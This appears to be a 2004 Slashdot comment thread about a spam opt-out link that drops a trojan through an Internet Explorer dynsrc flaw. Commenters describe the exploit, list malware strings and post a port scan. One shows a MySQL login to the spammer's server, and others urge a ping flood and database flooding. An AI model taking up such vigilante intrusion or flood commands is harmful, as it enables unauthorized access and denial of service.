Spam Opt-out Link Triggers Malicious Code Attack 327
Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site, that when the user scrolls the page, triggers a drag-drop javascript exploit. Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings. As The Reg says "It comes as little surprise that this feature is been taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in questions points to www. xcelent.biz (As in The Reg story, space intentionally included) so even if you can't block the mail yet it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include "features" such as this in the near future."
devious (Score:4, Informative)
MOD PARENT (with malicious address) DOWN! (Score:2, Insightful)
But then again . . . (Score:5, Insightful)
Re:But then again . . . (Score:5, Informative)
http://www.xcelent.biz/d/ [xcelent.biz] is a link to another page in that domain. Also has more graphics for better slashdotting potential.
P.S. Still be careful. They could always move the pages around.Re:MOD PARENT (with malicious address) DOWN! (Score:3, Insightful)
Microsoft says "No Problem" (Score:5, Funny)
I mean, using a scrollbar. Come on, what kind of ignorant user is going to use a scrollbar an a site they don't trust?
Re:Microsoft says "No Problem" (Score:5, Informative)
The idea is that all the website designer has to do is make an image that LOOKs like a scrollbar. The user goes and clicks and drags it to scroll down, not knowing it's fake. If there is a DYNSRC="..." attribute specified in the <IMG...> tag, Internet Explorer downloads and runs whatever program is specified, without any kinds of prompts whatsoever.
Even with SP2 installed.
Re:Microsoft says "No Problem" (Score:2, Informative)
Re:Microsoft says "No Problem" (Score:5, Interesting)
For the curious, here is an interesting post [seclists.org] that describes the exploit at some length. Essentially, it uses an HTML 'dynsrc' attribute (proprietary Microsoft extension) to allow IE to download the executable, and javascript to use the 'shell:' protocol to execute it. It's not a particularly new flaw, but this is the slickest exploit of it I've seen.
Re:Microsoft says "No Problem" (Score:3, Funny)
I dont know about you (Score:5, Informative)
Re:I dont know about you (Score:2)
Seriously though, I've seen computers bought less than a month previously that ALREADY have their subscription expired due to the length of time the computer sat at the store---it's not surprising to think that even new-ish comptuers might not have either the patch or the virus defs
Re:I dont know about you (Score:2)
Re:I dont know about you (Score:5, Informative)
GetSystemDirectoryA, xProxyBot v 1.0.0, 1.0.0 , w32.exe,
Windows Service Application, www.earthlabs.biz,
sockproxy/rec.php.
Software\
Software\Microsoft\Windows\ CurrentVersion\RunServices
%s?&p=%d&v=%s
VisitW
SYSTEM\CurrentControlSet\ Control\SafeBoot\
explorer.exe
Mozilla/4.0 (compatible)
InternetCloseHandle, InternetGetLast ResponseInfoA
InternetReadFile , InternetCrackUrlA
InternetOpenUrlA
InternetOpen
FtpPutFileA, FtpGetFileA
HttpSendRequestA, HttpOpenRequestA
InternetGet ConnectedStateEx, InternetGetConnected State
interesting strings (Score:3, Informative)
Re:interesting strings (Score:2, Informative)
Scan engine v4.3.20 for Linux.
Virus data file v4394 created Sep 22 2004
Identified it as:
$ uvscan --secure windows-update32.exe
/home/recall/windows-update
Found the BackDoor-CHP trojan !!!
More Legislation Needed. (Score:3, Insightful)
Re:More Legislation Needed. (Score:4, Insightful)
Also, from past experience, legislation is often abused in computer cases (as demonstrated by people like the RIAA). Personally, its been pretty rare to see decent laws against computer crimes (I haven't heard of any I agree with so far).
I think the development of sender verification frameworks for Email will also eventually help, provided that MS is willing to accept the open standards for once.
Re:More Legislation Needed. (Score:4, Insightful)
Re:More Legislation Needed. (Score:5, Insightful)
It's not specifically illegal under the CAN-SPAM act, but it's just as illegal as any other exploit, trojan or worm.
Re:More Legislation Needed. (Score:2)
Are you sure about that?
Assent means To agree, as to a proposal; concur. - http://dictionary.reference.com/search?q=assent
Re:More Legislation Needed. (Score:4, Insightful)
Obviously people here are aware that the site is bad. However, people who actually get the link in an email would be under the impression that the site is an opt out link. Providing them a virus instead is fraud and illegal.
If "known to be bad" refers to IE, that doesn't excuse anything. That's like saying that if you forget to lock your door, then it's all right for people to steal your stuff. In reality, it's still just as illegal.
Re:More Legislation Needed. (Score:5, Insightful)
If the IRS started auditing every known spammer with operations or residence in the United States, that would have a very chilling effect on spam. I'd bet my life savings that spammers don't report all of their income for tax purposes. If other countries then followed suit, spam would be relegated to the far corners of the world and easily firewalled.
The Final Solution to Spam (Score:3, Funny)
Another good reason... (Score:3, Insightful)
Re:Another good reason... (Score:4, Funny)
No. A good reason to hire a Spammer Assassin,
perhaps.
Violent, painful death is, after all, the only thing these sleaseballs fear.
Re:Another good reason... (Score:2)
Greeting from Malaysia (Score:5, Funny)
Re:Greeting from Malaysia (Score:3, Informative)
Yu, Shao
4F, No. 7, Aly. 7, Lane 355, Sec. 2, Neihu Rd.
Taipei City
TW
Shao Yu (SY167-TW) hn87788676@hn.hinet.net
+886-9-36-045496
Re:Greeting from Malaysia (Score:2)
Country: TW
Netname: YU-SHAO-E4-TW
Descr: CHTD, Chunghwa Telecom Co., Ltd.Data-Bldg. 6F, No. 21, Sec. 21, Hsin-Yi
Rd.,Taipei Taiwan
Status: ASSIGNED NON-PORTABLE
Source: TWNIC
Server: APNIC
Inetnum: 61.218.79.48 - 61.218.79.63
Dumb (Score:5, Funny)
Re:Dumb (Score:5, Informative)
Why is the site still up? (Score:5, Insightful)
I realize that another spammer will take advantadge of the hole next week but if the hosters were blacklisted from DNS servers, the offending files might get removed a little faster.
Re:Why is the site still up? (Score:5, Funny)
1. Law enforcement agencies asked to keep it up
2. Hinet Taiwan doesn't give a shit
I'm betting on option #2.
Re:Why is the site still up? (Score:2)
That would take time. It's much quicker and easier to just slashdot the site.
Simple really... (Score:3, Informative)
Useful slashdotting!! (Score:4, Funny)
There should be a real link, in order to
Re:Useful slashdotting!! (Score:2)
Re:Useful slashdotting!! (Score:2)
Re:Useful slashdotting!! (Score:2)
Hazardous link (Score:5, Informative)
Of course, anyone who installs that on a non-isolated, non-virtual machine pretty much deserves the results. It looks like it has the standard "Software\Microsoft\Windows\Current Version\Run", "Software\Microsoft\Windows\Current Version\RunServices", and "SYSTEM\CurrentControlSet\Control\SafeBoot\" registry hooks. (Unix "strings" is your friend....)
Use your powers for good (Score:5, Interesting)
Re:Use your powers for good (Score:3, Informative)
Re:Use your powers for good (Score:2)
Re:Use your powers for good (Score:2)
Re:Use your powers for good (Score:5, Funny)
(click link below to show link...)
Re:Use your powers for good (Score:2)
Or better yet, do... it'll increase the traffic to the site
Re:Use your powers for good (Score:2)
sudo ping -f www.xcelent.biz (I never ping flooding required super user priveleges)
Even better - choose a link with graphics on. (Score:5, Informative)
a [xcelent.biz] b [xcelent.biz] c [xcelent.biz] d [xcelent.biz]. "d" looks pretty heavy on graphics.
.02
cLive ;-)
Re:Even better - choose a link with graphics on. (Score:3, Insightful)
Don't forget the good services of SSL.
You should use https for everything so that you get a [xcelent.biz] b [xcelent.biz] c [xcelent.biz] d [xcelent.biz]
Re:Even better - choose a link with graphics on. (Score:2)
Re:Even better - choose a link with graphics on. (Score:2)
At last, a good use for these useless scripts I have to bother my friends
No it hasn't, MOD TROLL (Score:2)
cLive
New News? (Score:5, Informative)
Re:New News? (Score:2)
Of course, now that we have HTML email with IMG tags (whoopee.) you don't even need to click on a link anymore.
Re:New News? (Score:2)
Most people don't ever click on the opt-out link for that exact reason. The fact that someone has made it even more dangerous to do so just proves the point.
As long as they can keep saying "but you haven't opted out" they're safe.
lamer is hosted on hinet.com (Score:5, Informative)
www.xcelent.biz has address 61.218.79.53
host 61.218.79.53
53.79.218.61.in-addr.arpa domain name pointer 61-218-79-53.HINET-IP.hinet.net
and people wonder why i firewall 60/7
MIME Defang (Score:3, Informative)
I hate spam, but I haven't had a false positive or negative in forever combining the bayes inside spamassassin with the bayes inside thunderbird.
Chris
Re:MIME Defang (Score:3, Informative)
That is mostly the way i use it, disabling html, checking attached files for virus, and the windows executable extensions that passed the antivirus check gets renamed anyway to make them not executable without strong user action. Attached HTML pages sometimes don't look/work as desired, bu
Exploit (Score:5, Informative)
interesting ports on the spammer's site (Score:5, Interesting)
Interesting ports on 61-218-79-53.HINET-IP.hinet.net (61.218.79.53):
(The 1651 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
135/tcp filtered msrpc
443/tcp open https
445/tcp filtered microsoft-ds
3306/tcp open mysql
6000/tcp open X11
Nmap run completed -- 1 IP address (1 host up) scanned in 54.453 seconds
Re:interesting ports on the spammer's site (Score:4, Interesting)
Trying 61.218.79.53...
Connected to 61-218-79-53.HINET-IP.hinet.net.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.5p1
Hmm.. Isn't 3.5p1 vulnerable to some exploit? Not that I'm implying anything!
Re:interesting ports on the spammer's site (Score:3, Funny)
That AC is not me.
*runs*
Re:interesting ports on the spammer's site (Score:5, Interesting)
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 658 to server version: 3.23.54
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+-----------------+
| Database |
+-----------------+
| earth_bizzads |
| herbalmarketing |
| mysql |
+-----------------+
3 rows in set (0.45 sec)
mysql>
Re:interesting ports on the spammer's site (Score:3, Interesting)
Interesting, one of the string literals in the downloaded binary [slashdot.org] is "www.earthlabs.biz/sockproxy/rec.php", a database of infected clients perhaps?
Re:interesting ports on the spammer's site (Score:5, Funny)
Re:interesting ports on the spammer's site (Score:3, Informative)
mysql> show databases;
(snipped thanks to lameness filter)
4 rows in set (11.56 sec)
mysql> use test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
How about? (Score:2)
We could populate that sucker with crap records for eternity and fill his HDD...
I can't do it right now because I'm at work... how about somebody with 'leet mySQL hacking skills that's at home right now?
Re:interesting ports on the spammer's site (Score:3, Informative)
Interestingly they never disabled the default "test" user for MySQL. Not that much can be done (user "test" has no privileges on any databases) but I was in fact able to log in...
Re:interesting ports on the spammer's site (Score:2, Informative)
The only thing I click on in a Sapm is... (Score:2, Informative)
The only thing you should be clicking on, in a spam message, is the delete icon/key.
Re:The only thing I click on in a Sapm is... (Score:2)
Or, if you got a training spamfilter, the "Mark as Spam" button.
A SPAM opt-out trojan... (Score:3, Insightful)
CAN-SPAM may require an opt-out option in the e-mail to remain legal. However, the legislation DOESN'T protect you from the consequences of using that opt-out option.
It's legislated social engineering at its finest. Good luck out there.
Not Surprising (Score:2, Insightful)
Politicos without "tech savvy" - 0
This is the way it will always be unfortunately. Unless the whole population eventually can understand all the technical aspects of computers and the internet, or computers and the internet become so rock solid/secure AND easy to use, it will always be this way.
Javascript console (Score:2, Interesting)
Error: unterminated string literal Source File: http://focusin.ads.targetnet.com//ad/id=dmitryiva n ov&opt=hjj&rw=468&rh=60&cv=220&uid=673 475 Line: 3, Column: 17 Source Code: document.writeln('
Error: newPopup has no properties Source File: http://mediamgr.ugo.com/js.ng/Network=ugo&size=1x1 &adtype=over&affiliate=ultimate-guitar&suba=ultima te-guitar&channel=music&subchannel=tic&category=ti c&PT=ct
send it to the MCSE boys (Score:4, Funny)
Slightly OT-Malicious spam opt-outs and MYPOINTS (Score:4, Interesting)
Since then I'm getting a LOT of spam, I received none prior. All have the same recipient name as the Mypoints mail and some other common characteristics, but none of the opt-out stuff. Thankfully, gmail is autofiltering them without any need for intervention, but I can't help but feel MyPoints are behind it.
Has anyone else had the same thing happen?
Well I went to look at the virus (Score:3, Informative)
Didn't get that far. Just loading the page launched it. Anti-virus kicked in with a warning, home page was attempted to change, and then I got a call from headquarters to follow the delousing drill, since they also get all of our warnings.
Well that was fun. Didn't get to see any scroll bar :(
Windows 2000 - IE 5.50.4807.2300
Re:Well I went to look at the virus (Score:3, Informative)
the js code scrolls the page for you, instead of the actual scroll bar. since you're scrolling the page (via javascript) the real scroll bar reflects the new page position, making you think you actually were dragging the scroll bar.
as you learned, the code does
Win32.Sokeven.D (Score:2, Informative)
Added to Computer Associates database 9/21/04
What do other vendors call this?
Why is this a surprise? (Score:5, Insightful)
It's not like spammers are a class of people to be trusted. I always felt the opt-out requirement was joke and prime for abuse. By opting out, you are telling the spammer that you read every email that comes your way and they add it to their list of email addresses that actually respond to spam.
So what do they do with this list? If they follow the letter of the law, they will stop spamming - but, they have a list of high quality email IDs that they can sell to other spammers.
Users should always follow these simple instructions with regards to email spam:
1. Make sure you have an incoming mail spam filter, like SpamAsassin.
2. Delete any spam that gets through.
3. If you are interested in the product, do not contact the email (spam) source, reply to the email, click on "helpful" buttons. Find reputable mainstream vendors - if it's great then Wal-Mart, Best Buy, Circuit City, etc. will stock it.
myke
Re:Why is this a surprise? (Score:2)
If you are interested, buy from a competitor. Note that under your system, it still makes sense for a manufacturer (e.g. the makers of Cialis, Levitra, or herbal substitutes) to support spam (either directly or through dealer incentives). E.g. if someone spams you to bu
Why? (Score:2)
Why, exactly, is anybody reading SPAM? It is not like you cannot tell just by looking at the subject and the From line.
Secondly, why are people viewing emails as anything but text?
Hasn't this always been the case? (Score:2)
How many people really trust spammers to honor an opt-out?
Other sites on same server doing the same thing. (Score:5, Informative)
YARTNUIE (Score:2, Redundant)
Another
Reason
To
Not
Use
Internet
Exp
Your sig (Score:2)
Quick .EXE Analysis (Score:4, Interesting)
Some other strings give a few clues about what it does:
- Software\Microsoft\Windows\CurrentVersion\Run - It installs itself in the registry.
- Mozilla/4.0 (compatible) - It grabs stuff of the web and tries to look like IE in the logs.
- SYSTEM\CurrentControlSet\Control\SafeBoot - Tries to get started in safe mode too.
It installs itself in Software\Microsoft\Windows\CurrentVersion\Run as 'w32.exe'. I don't see it doing very much though. I've let it loose on a VMWare '98 session. No opened ports (unless it responds to portknocking), no attempts at outbound communication, maybe '98 is too old for it!I just got exploited (Score:3, Informative)
But the exploit worked !! I was expecting to get a pop up from NAV with an exciting alarm sound
(Un)Fortunately since it worked now I know what it does :
1) Add thw windows-update.exe in the startup folder
2) Add a new file cmd.dat to the startup folder.
Anyway since I had gone so far, I tried running the Windows-udpadte , but that gave me the error that it was not a valid exe file. I ran it in the protected moded (available when u slecet run as.. in Win XP). Then I renamed the dat file to
BTW if anyone else has tried it out and know about something else that should be done pls let me know. And does anyone have a clue why NAV does not detect this ?? Maybe u need to activate it for IE or make IE the default browser ???
Disable Javascript and Java (Score:2)
Bottom line: EXECUTING FOREIGN COMPUTER CODE (be it Javascript or Java) IS A POTENTIAL HAZARD. Solution: Disable the execution of such code in your browser. Don't reactivate it until providers (of Javascript or Java) allow you to sue them for liability). Until then they don't trust their own co
Can't we just deal with this already (Score:3, Interesting)
I figure 10, 20 thousand of these losers tops and the problem will go away.
Re:Can't we just deal with this already (Score:3, Insightful)
I figure 10, 20 thousand of these losers tops and the problem will go away.
While I appreciate the sentiment (personally I'm thinking boiling oil would be appropriate for spammers) I doubt it'd help. Even with the de
Test new Spamassasin 3.0.0 against this! (Score:3, Insightful)
PCB$@#
And people say ICANN is worthless... (Score:3, Interesting)
Thank you ICANN! :)
I block all .biz (Score:3, Interesting)
get over it.
Fill his database (Score:5, Interesting)
Re:Fill his database (Score:3, Informative)
DNS trace - Lets give the address' owner a call (Score:4, Informative)
Domain Name: XCELENT.BIZ
Domain ID: D7752456-BIZ
Sponsoring Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Domain Status: clientTransferProhibited
Registrant ID: CNEU-105661
Registrant Name: Anandan Krishan
Registrant Organization: Iscon & Krishan
Registrant Address1: Suite 50-12
Registrant Address2: Jalan Yap Kwan Seng.
Registrant City: Kuala Lumpur
Registrant State/Province: KL
Registrant Postal Code: 50450
Registrant Country: Malaysia
Registrant Country Code: MY
Registrant Phone Number: +603.27756842
Registrant Facsimile Number: +603.27756642
Registrant Email: win2save@yahoo.com
Administrative Contact ID: CNEU-105617
Administrative Contact Name: Anandan Krishan
Administrative Contact Organization: Iscon & Krishan
Administrative Contact Address1: Suite 50-12
Administrative Contact Address2: Jalan Yap Kwan Seng.
Administrative Contact City: Kuala Lumpur
Administrative Contact State/Province: KL
Administrative Contact Postal Code: 50450
Administrative Contact Country: Malaysia
Administrative Contact Country Code: MY
Administrative Contact Phone Number: +603.27756842
Administrative Contact Facsimile Number: +603.27756642
Administrative Contact Email: win2save@yahoo.com
Billing Contact ID: CNEU-105617
Billing Contact Name: Anandan Krishan
Billing Contact Organization: Iscon & Krishan
Billing Contact Address1: Suite 50-12
Billing Contact Address2: Jalan Yap Kwan Seng.
Billing Contact City: Kuala Lumpur
Billing Contact State/Province: KL
Billing Contact Postal Code: 50450
Billing Contact Country: Malaysia
Billing Contact Country Code: MY
Billing Contact Phone Number: +603.27756842
Billing Contact Facsimile Number: +603.27756642
Billing Contact Email: win2save@yahoo.com
Technical Contact ID: CNEU-105617
Technical Contact Name: Anandan Krishan
Technical Contact Organization: Iscon & Krishan
Technical Contact Address1: Suite 50-12
Technical Contact Address2: Jalan Yap Kwan Seng.
Technical Contact City: Kuala Lumpur
Technical Contact State/Province: KL
Technical Contact Postal Code: 50450
Technical Contact Country: Malaysia
Technical Contact Country Code: MY
Technical Contact Phone Number: +603.27756842
Technical Contact Facsimile Number: +603.27756642
Technical Contact Email: win2save@yahoo.com
Name Server: NS1.GRAITHBOADER.BIZ
Name Server: NS2.GRAITHBOADER.BIZ
Name Server: NS2.TIKONDES.BIZ
Created by Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Last Updated by Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Domain Registration Date: Wed Sep 15 03:53:27 GMT 2004
Domain Expiration Date: Wed Sep 14 23:59:59 GMT 2005
Domain Last Updated Date: Wed Sep 15 04:03:16 GMT 2004
**
Re:Why oh why (Score:2)
I didn't see mention of 'arab' in there.
More seriously, doesn't this gel slightly with the windows Eula?
Re:Refresh Every Minute (Score:2)